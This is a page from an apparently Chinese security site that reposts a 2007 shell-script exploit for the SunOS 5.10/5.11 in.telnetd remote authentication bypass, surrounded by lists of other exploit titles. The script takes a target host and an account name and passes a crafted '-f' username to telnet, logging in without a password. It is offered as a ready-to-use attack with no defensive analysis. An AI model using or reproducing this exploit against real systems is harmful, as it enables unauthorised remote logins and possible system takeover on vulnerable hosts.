首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SunOS 5.10/5.11 in.telnetd Remote Authentication Bypass Exploit
来源:kingcope@gmx.net 作者:Kingcope 发布时间:2007-02-12  
#!/bin/sh
# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL
#
# *********************ATTENTION********************************
# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES
# (C) COPYRIGHT Kingcope, 2007
#
################################################################
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net"
if [ $# -ne 2 ]; then
echo "./sunos <host> <account>"
echo "./sunos localhost bin"
exit
fi
echo ""
echo "ALEX ALEX"
echo ""
telnet -l"-f$2" $1

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SAP Web Application Server 6.4
·uTorrent 1.6 Remote Heap Overf
·Axigen <= 2.0.0b1 Remote Denia
·Axigen <= 2.0.0b1 Remote Denia
·Microsoft Visual Studio 64-bit
·LushiWarPlaner 1.0 (register.p
·AT Contenator <= v1.0 (Root_To
·LushiNews <= 1.01 (comments.ph
·Xaran Cms <= 2.0 (xarancms_hau
·LightRO CMS 1.0 (index.php pro
·phpCC <= 4.2 beta (nickpage.ph
·Site-Assistant <= v0990 (paths
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved